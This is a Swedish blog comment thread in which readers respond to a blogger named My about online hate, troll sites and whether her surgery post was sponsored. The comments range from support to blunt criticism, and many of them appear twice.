 20. Håller med dej. Men gå inte in där och läs eller kommentera. Vem skulle må bra av det. Du blir bara ledsen och det inte värt det. Går ej att ändra på andra. Så lev ditt liv och ha det fint. Kram.

 21. Du är ju inne och provocerar dem. Varför skriva att det inte är reklam för att sen reklam märka inlägget? Gå inte in på sånna sidor och skriv inte på bloggbevakning, du gör bort dig och matar trollen. Jag gillar varken dig eller henne speciellt mycket, men det är ju vida känt att mobbare tycker det är kul med reaktioner så strunta i att skriva där inne

  • Men någon gång så rinner ju bägaren över. Även för mig. X-antal anälmningar för långa. X-antal påståenden kring mig som mamma, som person, huruvida jag är ful, äcklig, mytoman, kleptoman och gud vet allt… när ska det få ett stop? Det är 2017 och häxjakten är i full gång….

   • Fast du får ju inte låta den göra det. När du dementerar att du gör reklam för att sen markera inlägget med reklam så matar du ju dem. Du bevisar att de har rätt. Du lägger dig. Håll huvudet högt och strunta i det, gå inte ens in där. Då kommer du komma mycket mycket längre. Får du kritik här så bemöt den om du vill, men strunta i andra sidor. Det är inte dina läsare, du behöver inte bry dig om dem.

 22. Men snälla snälla My! Lägg ner denna energi som du skriver om på något helt annat, på din rehabilitering istället. Du borde vila upp dig, stressa ner, komma till ro efter en sådan här operation, men så sitter du och skriver ett jätte jättelångt argt negativt inlägg. Du kan aldrig någonsin få trollen o tanterna att sluta. Visa istället att du står i högre kurs än vad de gör. Börja göra som proffsbloggarna gör, Carolina Gynning, Katrin Zytomierska, för att inte tala om Charlotte Perelli, de skulle aldrig aldrig någonsin kommentera en hatkommentar, finns inte på kartan, och därför tycker trollen inte att det är roligt att skriva så mycket skit på deras bloggar för de får absolut inget gehör

  Om du ska hålla på och bemöta, förklara, gå i försvarsställning m.m ja då matar du bara trollen och tanterna med ännu mer energi..

  Låt dig inte gå i denna fällan, utan skit i att bemöta skit överhuudtaget, håll dig för god för det och då får du också större status överallt.

  Titta på Perelli, hon bemöts som en äkta diva och det är hon ju också, hon har skyhög status överallt, för hon kommenterar aldrig något negativt på sin blogg o hon skriver heller aldrig något negativt heller. Gör som stjärnorna och inte som trollen och tanterna. Lycka till med rehabiliteringen.

   • Jag ångrar verkligen att jag läste dedär vidriga kommentarerna, hade högre tankar om folk. Vad har dessa människor varit med om eftersom de har en har ett sådant story behov av att vara så elaka? Ledsen för din skull My, du förtjänar inte att bli behandlad på det sättet 💕 Tror egentligen att det är några få som skriver och att de skriver många kommentarer, egentligen säger de så mycket mer om dem än om dig. Vi är så många fler som inspireras utav dig på så många olika plan!

    Att kvinnor ifrågasätter andra kvinnor angående #metoo inlägg påverkar hela syftet med det. Jag har exempelvis inte gått ut och berättat om det som hände mig för 10 år sedan och påverkat mitt liv så mycket, för jag är rädd över att inte bli betrodd. Att folk gör narr av mina upplevelser, som satt så djupa spår i mig (och för att jag precis som du är orolig över hur mamma skulle ta det).
    Män som står bakom sexuella trakasserier av olika grad, är också de som vinner på att vi kvinnor inte står enade i detta. Syftet med #metoo var ju att vi tillsammans kan göra skillnad och att vi stödjer och tror på varandra.

    Ta hand om dig fina My 💕

  • Jag håller med! Två fel blir aldrig ett rätt – det blir bara pajigt och barnsligt att svara upp med kilometerlånga texter.
   Om du vill att din blogg ska vara en feelgood-blogg måste du ställa dig över alla som försöker missförstå eller leta fel på dig – annars blir din blogg bara en sandlåda med dålig energi. Sorry – men då känner jag vissa ggr jag går in och läser; ånej, vad är det nu hon är upprörd över eller hur har hon blivit missförstådd idag? Vi vanliga läsare behöver inte drama flera ggr i veckan utan mår bäst utan den!

   • Håller verkligen med dig den där trevliga känslan som jag tror och hoppas My vill ha härinne försvinner mer och mer av alla dessa långa arga inlägg som de flesta av oss läsare nog vill vara utan sköt det privat i sådana fall eller strunta i de. Kanske dags att ta en paus My istället för ha allt detta hängade över dig varje dag få ny energi och starta på nytt när du är klar med din utbildning och det kanske har lugnat ner sig. Hoppas också du kan komma till ro på Öland de veckor du är där känns mest som ett ont måste när jag läser dina inlägg därifrån.

 23. Hej
  Har följt dig i några år på sociala medier o du är en stark person. Tänker varje gång du har haft en motgång att du är en bra person som delar med dig av sanningen om allt. Usch o fy för allt näthat tror bara människor är avundsjuka. För om jag inte tycker inte om ngt så slutar jag ju läsa om den personen jag går inte in o skriver ngt negativt.
  O gillar Åza o din podd??
  Kram Cissi

 24. Hua, VI TJEJER SKALL STÖTTA VARANN❤️❤️❤️ Svenska avundsjukan… varför kan vi inte vara snälla mot varann??? Verkligen SÅ TRAGISKT ATT LÄSA ATT TJEJER GÖR DETTA MOT ANDRA TJEJER!! Kram på dig My❤️

 25. Hej
  Har följt dig i några år på sociala medier o du är en stark person. Tänker varje gång du har haft en motgång att du är en bra person som delar med dig av sanningen om allt. Usch o fy för allt näthat tror bara människor är avundsjuka. För om jag inte tycker inte om ngt så slutar jag ju läsa om den personen jag går inte in o skriver ngt negativt.
  O gillar Åza o din podd💖💖
  Kram Cissi

 26. Tanken har aldrig slagit dig att det är lite sjölvförvållat? Givetvis inte allt (!) men att halva Sveriges blogg-kollegor gick emot dig, de gjordes inte bara för att. Eller för att du beter dig på ett sätt som gör att du automatiskt blir största samtalsämnet o lunchrummet några ggr i veckan. Du, Anna Book och Timell. Ta dig i kragen och rygg upp dig alt. Sluta blogga. DU väljer detta livet. Är som att klaga på att man är tjock – ät inte då. Kommentarer och ingen tycker om mig – True, men sluta blogga då så är det löst på en vecka.

 27. Jag känner att du låter ”sånt här” ta väldigt mycket av din energi. Släpp taget om det. Låt dig inte påverkas. Tyvärr så följer sånt här med om man som du är halvt offentlig som bloggare. Finns och kommer alltid att finnas människor som vill leta fel. Om du vet i ditt eget sinne att du gjort rätt. (Tänker på det om reklam och sponsring) så är det viktigast. Dock tycker jag att det är bra att man lyfter frågan om just köpta inlägg och reklam markering hos bloggare rent allmänt.

 28. Det tråkiga är att detta inlägg kommer komma upp på bloggbevakning. Åter igen matas ”trollen”
  Tyvärr My, så blir det du som slänger på mer ved på en eld som redan brinner, när dessa inlägg kommer upp. Och du går i fällan varje gång. Förstår dock viljan att få försvara sig fullt ut,men tror du inte ändå att det är bättre att hitta ett sätt för att kunna lägga din energi på det som är viktigt och betyder något?
  Enda gångerna jag läst om allt du skrivit i inlägget är på din blogg, när du tar upp det med jämna mellanrum, som sedan bloggbevakning skriver om.
  Jag är så tacksam att jag inte har ett behov av att bli någon inom social medier, det hade knäckt mig rakt av! Trots ett bra självförtroende och en bra självkänsla. Kan inte för mitt liv inte komma något som gör det värt att vara inom sociala media branschen. Heja dig som orkar!

 29. Hua, VI TJEJER SKALL STÖTTA VARANN❤️❤️❤️ Svenska avundsjukan… varför kan vi inte vara snälla mot varann??? Verkligen SÅ TRAGISKT ATT LÄSA ATT TJEJER GÖR DETTA MOT ANDRA TJEJER!! Kram på dig My❤️

 30. Tanken har aldrig slagit dig att det är lite sjölvförvållat? Givetvis inte allt (!) men att halva Sveriges blogg-kollegor gick emot dig, de gjordes inte bara för att. Eller för att du beter dig på ett sätt som gör att du automatiskt blir största samtalsämnet o lunchrummet några ggr i veckan. Du, Anna Book och Timell. Ta dig i kragen och rygg upp dig alt. Sluta blogga. DU väljer detta livet. Är som att klaga på att man är tjock – ät inte då. Kommentarer och ingen tycker om mig – True, men sluta blogga då så är det löst på en vecka.

 31. Hej, ja det har verkligen gått för långt för längesedan med alla hemska kommentarer ?
  Om jag ska bidra med något annat så vill jag iaf verkligen tacka dig för dina inlägg om bukplastik! Jag ska själv genomgå det inom några månader och allt jag läser hjälper mig. Så stort tack för det <3 Ta hand om dig och försök att stänga BBev ute och se till dina fina vänner omkring dig som ger dig energi istället. Även fast det är lättare sagt än gjort!

 32. Jag känner att du låter ”sånt här” ta väldigt mycket av din energi. Släpp taget om det. Låt dig inte påverkas. Tyvärr så följer sånt här med om man som du är halvt offentlig som bloggare. Finns och kommer alltid att finnas människor som vill leta fel. Om du vet i ditt eget sinne att du gjort rätt. (Tänker på det om reklam och sponsring) så är det viktigast. Dock tycker jag att det är bra att man lyfter frågan om just köpta inlägg och reklam markering hos bloggare rent allmänt.

 33. Snygg offerkofta! Den klär dig verkligen! Eller inte.
  Men du måste helt ha missat att CamCam skrev ett HELT inlägg om hur besviken hon var på sina läsare efter hur de kommenterat på inlägget om dig? Hur hon backade dig till 100% och verkligen har satt ner foten efter det bland kommentarerna?
  Jag tror mest att du är sur för att du blev påkommer här. Du skriver att din FÖRRA operation inte var sponsrad och det må så vara. Men hur är det med den HÄR? Som både du och Anna markerat med samarbete och reklam?

  • Precis som jag skriver så INGÅR min operation i min förra. (Detta har jag utförligt berättar om, se tidigare inlägg) så Nej, min operation är inte sponsrad. Om den hade varit det så hade jag inte haft några som helst problem med att skriva om det…..
   Allting som skriva? Okay tycker du? Min roll som mamma, att jag är ful, psykopat, mytoman osv… för att jag delar med mig ev en operation som jag själv bekostat?
   Du kallar mig offrjofta. Ta dig en tugga på ordet offerofta, läs, reflektera och fundera igen! Inte Okay!

   • Men om den inte är sponsrad, varför skriver du att inlägget är reklam? Det är att indirekt erkänna att Cam har rätt och det sänker verkligen din trovärdighet. Antingen lär dig marknadsföringslagen för sociala medier, jag är säker på att Camca kan svara på frågor eftersom hon kan den så du kan göra rätt och vara säker i det eller så får du acceptera att dina läsare misstror dig. Att reklammarkera ett inlägg samtidigt som du skriker i högan sky att operationen inte är sponsrad får dig bara att framstå som oärlig. Se din egen roll i den här kritiken. Och har du tänkt bemöta mitt påstående om Cams inlägg där hon backar och försvarar dig till 100% eller passar det inte riktigt in i din agenda där hon är ond och du är ett oskyldigt och gott offer?

 34. Det tråkiga är att detta inlägg kommer komma upp på bloggbevakning. Åter igen matas ”trollen”

  Tyvärr My, så blir det du som slänger på mer ved på en eld som redan brinner, när dessa inlägg kommer upp. Och du går i fällan varje gång. Förstår dock viljan att få försvara sig fullt ut,men tror du inte ändå att det är bättre att hitta ett sätt för att kunna lägga din energi på det som är viktigt och betyder något?

  Enda gångerna jag läst om allt du skrivit i inlägget är på din blogg, när du tar upp det med jämna mellanrum, som sedan bloggbevakning skriver om.

  Jag är så tacksam att jag inte har ett behov av att bli någon inom social medier, det hade knäckt mig rakt av! Trots ett bra självförtroende och en bra självkänsla. Kan inte för mitt liv inte komma något som gör det värt att vara inom sociala media branschen. Heja dig som orkar!

 35. Hej, jag tycker att det skrivs massor m skit på både Bloggbevakning för att inte tala om Flashback och jag läser inte dessa annat än nu när du skrivit inlägg om detta.
  Här tror jag verkligen att du inte ska lägga energi alls, jag förstår att du känner dig arg och påhoppad. Var tyst istället och mata inte dessa troll.. jättesvårt att göra, men det är enda sättet. Jag tror du kommer att vinna över dem på det sättet…
  Du har genomgått en op, känslor på utsidan av det mesta just nu och då är det svårt att tänka klart. Du kan aldrig vinna över dessa människor som väljer att spendera sin tid på dessa sidor med uppenbart syfte att skada er som är i rampljuset. Att inte bry sig är jättesvårt, men jag tror man måste förhålla sig till detta och bara bestämma sig.
  Vi är många som enbart läser olika bloggar och sällan läser kommentarer heller. För mig är kommentarer inte intressant att läsa utan jag läser det DU skriver, men det är det såklart för er som skriver då det är er input!
  Fokusera på de kommentarer som är positiva och ger energi nu när du är nyopad och behöver lugn och vila.
  Lätt att ge råd, svårt att följa ?
  Ta hand om dig! Kram ?

 36. Men snälla My hur många gånger ska du skriva om samma saker vi förstår att du har och har haft det hårt men det blir inte bättre av att älta allt detta om och om och om igen och jag förstår inte gur du orkar hålla på när du dessutom har ont nu. Du får ursäkta och jag får säkert ett svar men jag får känslan av att du tar upp detta så fort kommentarerna härinne sjunker du vet ju att skriver du om det här igen så stiger de.
  Vem vann tävlingen förresten den skulle du väl presentera i söndags om jag minns rätt.

   • Sluta lägg ner tid på detta My hur många gånger har du inte fått det svaret av dina läsare det ger ingenting du kommer inte få stopp på de i alla fall skit i det punkt slut! Din bägare har runnit över många gånger och har det blivit bättre? Nej. Du får en massa kommentarer så fort du skriver om det här och jag håller med den som skrev det tidigare det känns som en medveten strategi sorry men så tycker jag och det utan att vara elak. Sluta med alla dessa försvarstal och milslånga inlägg (det har du också bett om råd tidigare men fortsätter ändå) lev ditt liv som du vill och nu istället för att titta tillbaks och bry dig så mycket av vad andra tycker och tänker hela tiden.

 37. Du e helt fantastisk My! Ledsen att höra om hur du mår. Vet precis vad du menar med att leva med ångest, tyvärr. Är väldigt öppen precis som du, tänker att det kan hjälpa någon. Men det är tufft! Jag förstår att du blir arg o ledsen, med all rätt, det gör dig bara ännu mer stark att erkänna. Det är svårt, men man får försöka att tänka att det är de som hatar som äger problemet..det är något som gått fel med dem. Har också haft ett otroligt tufft år. Är så tacksam för stöd, för livet och för godhet idag. Jag hoppas att du får må bättre snart och kan bortse från de som tar din energi. Kramar

 38. Så sorgligt att det finns människor som är så onda och tydligen njuter av att såra och just använder en situation när Du har det nog jobbigt ändå att vräka ur sig så fruktansvärt mycket ”skit”.
  -Du är för bra helt enkelt och kvinnor har en egenhet att inte tåla just det!
  -Nättroll spricker i solen-Välkomnar en stor varm sol!
  Kram på Dig!

 39. Hej, ja det har verkligen gått för långt för längesedan med alla hemska kommentarer 🙁
  Om jag ska bidra med något annat så vill jag iaf verkligen tacka dig för dina inlägg om bukplastik! Jag ska själv genomgå det inom några månader och allt jag läser hjälper mig. Så stort tack för det <3 Ta hand om dig och försök att stänga BBev ute och se till dina fina vänner omkring dig som ger dig energi istället. Även fast det är lättare sagt än gjort!

 40. Med allt det hat du beskriver så hade jag lagt ner bloggandet. Om inte så för din familjs skull (sonen)
  Jag har själv lagt ner en blogg en gång i tiden pga otrevligheter men långt ifrån vad du beskriver.
  Jag hittade dig när jag sökte om magoperationer och är tacksam för det men. Jag har inte följt ngt och ser ej men såg på unatagram att du skulle op igen o ville då läsa igen o kom till detta. Usch och fy… gör ett avbrott och hela dig själv, kom ikapp livet. Sluta blogga o tillfredställ alla andra , ta hellre hand om dig själv o din familj… jobba som pt eller bli mäklare det tjänar man tillräckligt på. Kramar och lycka till
  Ps. efter ett tag så känns inte saknaden av bloggandet så viktigt för man har helt andra sker att fokusera på med jobbet och livet

 41. Snygg offerkofta! Den klär dig verkligen! Eller inte.
  Men du måste helt ha missat att CamCam skrev ett HELT inlägg om hur besviken hon var på sina läsare efter hur de kommenterat på inlägget om dig? Hur hon backade dig till 100% och verkligen har satt ner foten efter det bland kommentarerna?
  Jag tror mest att du är sur för att du blev påkommer här. Du skriver att din FÖRRA operation inte var sponsrad och det må så vara. Men hur är det med den HÄR? Som både du och Anna markerat med samarbete och reklam?

  • Precis som jag skriver så INGÅR min operation i min förra. (Detta har jag utförligt berättar om, se tidigare inlägg) så Nej, min operation är inte sponsrad. Om den hade varit det så hade jag inte haft några som helst problem med att skriva om det…..

   Allting som skriva? Okay tycker du? Min roll som mamma, att jag är ful, psykopat, mytoman osv… för att jag delar med mig ev en operation som jag själv bekostat?

   Du kallar mig offrjofta. Ta dig en tugga på ordet offerofta, läs, reflektera och fundera igen! Inte Okay!

   • Men om den inte är sponsrad, varför skriver du att inlägget är reklam? Det är att indirekt erkänna att Cam har rätt och det sänker verkligen din trovärdighet. Antingen lär dig marknadsföringslagen för sociala medier, jag är säker på att Camca kan svara på frågor eftersom hon kan den så du kan göra rätt och vara säker i det eller så får du acceptera att dina läsare misstror dig. Att reklammarkera ett inlägg samtidigt som du skriker i högan sky att operationen inte är sponsrad får dig bara att framstå som oärlig. Se din egen roll i den här kritiken. Och har du tänkt bemöta mitt påstående om Cams inlägg där hon backar och försvarar dig till 100% eller passar det inte riktigt in i din agenda där hon är ond och du är ett oskyldigt och gott offer?

 42. Skit i vad andra skriver, bemöt det aldrig och framför allt sluta läs bloggbevakaren etc. Det finns ingen mening för dig att bemöta näthat och andra elaka kommentarer, låt det bara vara för andra och inte för dig. Skriv om ditt liv, fortsätt dela med dig, var ärlig och låt oss som läser dela din vardag, utmaningar och tankar. Men strunta i idioterna, släpp inte fram trollen i ditt kommentarsfält och sluta läs hos andra. Fokusera på positivt och det som ger dig energi och glädje. Vi blir aldrig älskade av alla och den sista idioten är ju inte född…så…skit i troll och förtal. Det du har varit med om från din uppväxt och senaste åren är mer än någon ska behöva bära rent ut sagt förjävligt. Kanske lätt för mig att skriva men bearbeta och gå vidare. Fastna inte i sorg, offer eller hat. Du är en vinnare och kan ta dig precis vart du vill. Du äger ditt liv nu gör det bästa av det. Stor kram! Ps. Sluta nu läs hos CamCam varför ge henne luft, klick etc.

  • Till Moster M.
   Precis exakt! Jag skrev ett inlägg här ovan att skita i att bemöta ngt överhuvudtaget, att göra som stjärnorna, Perelli, Zytomierska, Kenza, Gynning. De skulle aldrig aldrig någonsin bemöta något skit eller hat, det är under deras värdighet, därför har de också stjärnstatus. Om My börjar göra exakt likadant så kommer hon att få en oerhört hög status och mystik över sig precis som stjärnbloggarna har.
   Man behöver inte lämna ut sitt privata på en blogg för det gynnar bara de medelålders bloggtanterna som sitter här och skriver hat.
   Folk ska inte veta allt om ens privatliv, det angår ingen och ger bara mat till bloggtanterna att sitta och skriva ännu mera skit.
   My borde också sluta med att redogöra för hur sonen träffar föräldrarna, att han är på semester eller han är där eller där, för sådant är godis för bittra bloggtanter, då älskar de att sitta och skriva noveller här om att My är en dålig mamma etc.etc.
   My borde inte skriva ett dugg om sonen för ingen har med ett barn att göra, My borde inte heller skriva om att det är jobbigt att pendla mellan bostäderna, dubbla boenden, osv för detta matar de medelålders bloggtanterna ytterligare och ger dem skadeglädje som är den största glädjen för den typen av människor.
   Det räcker så gott och väl med fina bilder på bloggen, kläder, recept, alltså sådant som ger positiv energi. Det kommer säkert trots det att komma skit från bloggtanterna ett tag, men sedan tröttnar de.
   Om My vill ha status så ska hon omedelbart sluta upp att kommentera här inne överhuvudtaget, att Anna Book ständigt kommenterar och har arga livesändningar och blockar folk, sådant ska inte My börja med för det drar bara ner hennes status i samma läge.
   Åter igen, kolla stjärnbloggarna som Gynning, Zytomierska, Perelli, Kenza, bloggtanterna har inte ett skit att komma med där för ingenting kommenteras överhuvudtaget, och i Gynnings blogg t.ex kommer aldrig någonsin en skitkommentar ens igenom, hon skulle aldrig lägga ut något sådant då hon är mycket mån om sitt varumärke, så jobbar ett proffs och exakt så får man stjärnstatus.
   Ytterligare ett tips till My, andas, ta ett djupt andetag,ta en runda innan du sätter dig här och skriver långrandiga inlägg, och gå för allt inte i fällan om det är någon annan utan att nämna något namn som hetsar och säger att du visst ska kommentera och bemöta, gå inte i den fällan, börja tänka på din stjärnstatus som kommer att komma med tiden om du tänker på sådana här viktiga saker.
   Lycka till!

 43. Hej, jag tycker att det skrivs massor m skit på både Bloggbevakning för att inte tala om Flashback och jag läser inte dessa annat än nu när du skrivit inlägg om detta.
  Här tror jag verkligen att du inte ska lägga energi alls, jag förstår att du känner dig arg och påhoppad. Var tyst istället och mata inte dessa troll.. jättesvårt att göra, men det är enda sättet. Jag tror du kommer att vinna över dem på det sättet…
  Du har genomgått en op, känslor på utsidan av det mesta just nu och då är det svårt att tänka klart. Du kan aldrig vinna över dessa människor som väljer att spendera sin tid på dessa sidor med uppenbart syfte att skada er som är i rampljuset. Att inte bry sig är jättesvårt, men jag tror man måste förhålla sig till detta och bara bestämma sig.
  Vi är många som enbart läser olika bloggar och sällan läser kommentarer heller. För mig är kommentarer inte intressant att läsa utan jag läser det DU skriver, men det är det såklart för er som skriver då det är er input!
  Fokusera på de kommentarer som är positiva och ger energi nu när du är nyopad och behöver lugn och vila.
  Lätt att ge råd, svårt att följa 🙂
  Ta hand om dig! Kram 💕

 44. Men snälla My hur många gånger ska du skriva om samma saker vi förstår att du har och har haft det hårt men det blir inte bättre av att älta allt detta om och om och om igen och jag förstår inte gur du orkar hålla på när du dessutom har ont nu. Du får ursäkta och jag får säkert ett svar men jag får känslan av att du tar upp detta så fort kommentarerna härinne sjunker du vet ju att skriver du om det här igen så stiger de.
  Vem vann tävlingen förresten den skulle du väl presentera i söndags om jag minns rätt.

   • Sluta lägg ner tid på detta My hur många gånger har du inte fått det svaret av dina läsare det ger ingenting du kommer inte få stopp på de i alla fall skit i det punkt slut! Din bägare har runnit över många gånger och har det blivit bättre? Nej. Du får en massa kommentarer så fort du skriver om det här och jag håller med den som skrev det tidigare det känns som en medveten strategi sorry men så tycker jag och det utan att vara elak. Sluta med alla dessa försvarstal och milslånga inlägg (det har du också bett om råd tidigare men fortsätter ändå) lev ditt liv som du vill och nu istället för att titta tillbaks och bry dig så mycket av vad andra tycker och tänker hela tiden.

 45. Du e helt fantastisk My! Ledsen att höra om hur du mår. Vet precis vad du menar med att leva med ångest, tyvärr. Är väldigt öppen precis som du, tänker att det kan hjälpa någon. Men det är tufft! Jag förstår att du blir arg o ledsen, med all rätt, det gör dig bara ännu mer stark att erkänna. Det är svårt, men man får försöka att tänka att det är de som hatar som äger problemet..det är något som gått fel med dem. Har också haft ett otroligt tufft år. Är så tacksam för stöd, för livet och för godhet idag. Jag hoppas att du får må bättre snart och kan bortse från de som tar din energi. Kramar

 46. Hej My, jag tycker du ska berätta sanningen om dramat med din förra vän samt svansen med bloggdamer… Kanske fastnar kraxandet i halsen på vissa! Kram

  • Till trollet ”M”.
   Hej Trollet!
   Det är precis vad hon INTE ska göra!!! Fattar du trögt? My bör absolut inte mata trollen med skit om sitt privatliv!! Utan börja tänka på sitt varumärke..
   De sista kommentarerna här har inte My kommenterat, bra där!
   Om My ska bli mäklare och få respekt och anseende och representera en mäklarbyrå så ska My omedelbart sluta att kommentera något här inne överhuvudtaget utan bara lägga ut bilder och positiv energi för det är enbart sådant man vill läsa.
   Det kan bli svårt att få jobb som mäklare om man ständigt förekommer på nätet med negativiteter och mäklaryrket handlar om diskretion, har man inte det automatiskt så kommer man inte att få något mäklarjobb.
   Likadant med sponsorer och reklam, inga företag vill förknippas med en blogg som bara handlar om skvaller, skit, rykten, vill man tjäna pengar som bloggare måste man lära sig denna enkla ekvation. Skvaller, skit får man ta utanför en blogg, annars kanske man en dag står helt utan reklaminintäkter.
   Om jag som företag vill göra reklam för min produkt så lägger jag hellre ett samarbete med Kenza eller Gynning el. liknande som är stenhårda med att inget skit får tillträde till bloggen! Mycket tänkvärt och viktigt om man vill överleva som bloggare i denna konkurrensen.
   Bra att My inte kommenterar överhuvudtaget.
   Ska man bli tagen på allvar och bli mäklare med den diskretion det innebär så ska man nog också vara försiktig med att lägga ut bilder där man är avklädd vare sig med eller utan operation, sådant tillhör ens innersta privatliv. För bloggtanterna älskar att nyttja sådana bilder och fortsätta skriva skit.
   Man behöver inte ens kommentera att man ska göra en sådan operation, det tillhör ens privatliv.

 47. Så sorgligt att det finns människor som är så onda och tydligen njuter av att såra och just använder en situation när Du har det nog jobbigt ändå att vräka ur sig så fruktansvärt mycket ”skit”.
  -Du är för bra helt enkelt och kvinnor har en egenhet att inte tåla just det!
  -Nättroll spricker i solen-Välkomnar en stor varm sol!
  Kram på Dig!

 48. Vet du en sak My? Du är så fruktansvärt stark och de sårar mej att läsa detta om allt hat emot dej! Jag blir ledsen på riktigt! Under dom år vi umgicks och va vänner så VET jag att du INTE hade de lätt! Vi är många som vet det! ❤stay strong and fucking smile, trollen är inte värda ett piss, tror det endast ligger avundsjuka bakom sånt äckligt hat! Ta hand om dej nu och fokusera på de bra i livet! För vet du? Det är DU värd!!!! Massa kramar en gammal vän❤

 49. Med allt det hat du beskriver så hade jag lagt ner bloggandet. Om inte så för din familjs skull (sonen)
  Jag har själv lagt ner en blogg en gång i tiden pga otrevligheter men långt ifrån vad du beskriver.
  Jag hittade dig när jag sökte om magoperationer och är tacksam för det men. Jag har inte följt ngt och ser ej men såg på unatagram att du skulle op igen o ville då läsa igen o kom till detta. Usch och fy… gör ett avbrott och hela dig själv, kom ikapp livet. Sluta blogga o tillfredställ alla andra , ta hellre hand om dig själv o din familj… jobba som pt eller bli mäklare det tjänar man tillräckligt på. Kramar och lycka till
  Ps. efter ett tag så känns inte saknaden av bloggandet så viktigt för man har helt andra sker att fokusera på med jobbet och livet

 50. Skit i vad andra skriver, bemöt det aldrig och framför allt sluta läs bloggbevakaren etc. Det finns ingen mening för dig att bemöta näthat och andra elaka kommentarer, låt det bara vara för andra och inte för dig. Skriv om ditt liv, fortsätt dela med dig, var ärlig och låt oss som läser dela din vardag, utmaningar och tankar. Men strunta i idioterna, släpp inte fram trollen i ditt kommentarsfält och sluta läs hos andra. Fokusera på positivt och det som ger dig energi och glädje. Vi blir aldrig älskade av alla och den sista idioten är ju inte född…så…skit i troll och förtal. Det du har varit med om från din uppväxt och senaste åren är mer än någon ska behöva bära rent ut sagt förjävligt. Kanske lätt för mig att skriva men bearbeta och gå vidare. Fastna inte i sorg, offer eller hat. Du är en vinnare och kan ta dig precis vart du vill. Du äger ditt liv nu gör det bästa av det. Stor kram! Ps. Sluta nu läs hos CamCam varför ge henne luft, klick etc.

  • Till Moster M.

   Precis exakt! Jag skrev ett inlägg här ovan att skita i att bemöta ngt överhuvudtaget, att göra som stjärnorna, Perelli, Zytomierska, Kenza, Gynning. De skulle aldrig aldrig någonsin bemöta något skit eller hat, det är under deras värdighet, därför har de också stjärnstatus. Om My börjar göra exakt likadant så kommer hon att få en oerhört hög status och mystik över sig precis som stjärnbloggarna har.

   Man behöver inte lämna ut sitt privata på en blogg för det gynnar bara de medelålders bloggtanterna som sitter här och skriver hat.

   Folk ska inte veta allt om ens privatliv, det angår ingen och ger bara mat till bloggtanterna att sitta och skriva ännu mera skit.

   My borde också sluta med att redogöra för hur sonen träffar föräldrarna, att han är på semester eller han är där eller där, för sådant är godis för bittra bloggtanter, då älskar de att sitta och skriva noveller här om att My är en dålig mamma etc.etc.

   My borde inte skriva ett dugg om sonen för ingen har med ett barn att göra, My borde inte heller skriva om att det är jobbigt att pendla mellan bostäderna, dubbla boenden, osv för detta matar de medelålders bloggtanterna ytterligare och ger dem skadeglädje som är den största glädjen för den typen av människor.

   Det räcker så gott och väl med fina bilder på bloggen, kläder, recept, alltså sådant som ger positiv energi. Det kommer säkert trots det att komma skit från bloggtanterna ett tag, men sedan tröttnar de.

   Om My vill ha status så ska hon omedelbart sluta upp att kommentera här inne överhuvudtaget, att Anna Book ständigt kommenterar och har arga livesändningar och blockar folk, sådant ska inte My börja med för det drar bara ner hennes status i samma läge.

   Åter igen, kolla stjärnbloggarna som Gynning, Zytomierska, Perelli, Kenza, bloggtanterna har inte ett skit att komma med där för ingenting kommenteras överhuvudtaget, och i Gynnings blogg t.ex kommer aldrig någonsin en skitkommentar ens igenom, hon skulle aldrig lägga ut något sådant då hon är mycket mån om sitt varumärke, så jobbar ett proffs och exakt så får man stjärnstatus.

   Ytterligare ett tips till My, andas, ta ett djupt andetag,ta en runda innan du sätter dig här och skriver långrandiga inlägg, och gå för allt inte i fällan om det är någon annan utan att nämna något namn som hetsar och säger att du visst ska kommentera och bemöta, gå inte i den fällan, börja tänka på din stjärnstatus som kommer att komma med tiden om du tänker på sådana här viktiga saker.

   Lycka till!

 51. Dessa hemska människor som Alltid är anonyma och inte lever i vetkligheten, som lever av och frodas av att ”sänka” och förstöra för andra är inga du ska ägna en enda tanke. Det är människor som är bittra och så missnöjda med sina egna liv o tillvaro. Har själv drabbats och drabbas fortfarande. Men Vet ju vem jag är och tar inte åt mig det minsta. Det ska inte du heller göra. Lev ditt liv precis hur du vill My, och njut! Njut av alla fina du har runt dig, kärleken, din familj. ♥️

 52. Bryr dig inte om att nämna vad andra skriver till dig på din blogg. För då matar du bara bloggbevakaren och nätrollen. Som många andra också har skrivit redan, varför ta du alltid upp allt gammalt hela tiden i din blogg. Det blir sån upprepning för oss läsare.
  Vet inte vad du tycker om Johanna Toftby men hennes blogg är inspirerande. Lika så Magdalena Graaf mfl.

 53. Hej My, jag tycker du ska berätta sanningen om dramat med din förra vän samt svansen med bloggdamer… Kanske fastnar kraxandet i halsen på vissa! Kram

  • Till trollet ”M”.

   Hej Trollet!

   Det är precis vad hon INTE ska göra!!! Fattar du trögt? My bör absolut inte mata trollen med skit om sitt privatliv!! Utan börja tänka på sitt varumärke..

   De sista kommentarerna här har inte My kommenterat, bra där!

   Om My ska bli mäklare och få respekt och anseende och representera en mäklarbyrå så ska My omedelbart sluta att kommentera något här inne överhuvudtaget utan bara lägga ut bilder och positiv energi för det är enbart sådant man vill läsa.

   Det kan bli svårt att få jobb som mäklare om man ständigt förekommer på nätet med negativiteter och mäklaryrket handlar om diskretion, har man inte det automatiskt så kommer man inte att få något mäklarjobb.

   Likadant med sponsorer och reklam, inga företag vill förknippas med en blogg som bara handlar om skvaller, skit, rykten, vill man tjäna pengar som bloggare måste man lära sig denna enkla ekvation. Skvaller, skit får man ta utanför en blogg, annars kanske man en dag står helt utan reklaminintäkter.

   Om jag som företag vill göra reklam för min produkt så lägger jag hellre ett samarbete med Kenza eller Gynning el. liknande som är stenhårda med att inget skit får tillträde till bloggen! Mycket tänkvärt och viktigt om man vill överleva som bloggare i denna konkurrensen.

   Bra att My inte kommenterar överhuvudtaget.

   Ska man bli tagen på allvar och bli mäklare med den diskretion det innebär så ska man nog också vara försiktig med att lägga ut bilder där man är avklädd vare sig med eller utan operation, sådant tillhör ens innersta privatliv. För bloggtanterna älskar att nyttja sådana bilder och fortsätta skriva skit.

   Man behöver inte ens kommentera att man ska göra en sådan operation, det tillhör ens privatliv.

 54. Vet du en sak My? Du är så fruktansvärt stark och de sårar mej att läsa detta om allt hat emot dej! Jag blir ledsen på riktigt! Under dom år vi umgicks och va vänner så VET jag att du INTE hade de lätt! Vi är många som vet det! ❤stay strong and fucking smile, trollen är inte värda ett piss, tror det endast ligger avundsjuka bakom sånt äckligt hat! Ta hand om dej nu och fokusera på de bra i livet! För vet du? Det är DU värd!!!! Massa kramar en gammal vän❤

 55. Styrkekram till dig fina My✨???✨
  Tycker du är en fantastiskt mamma & förebild??
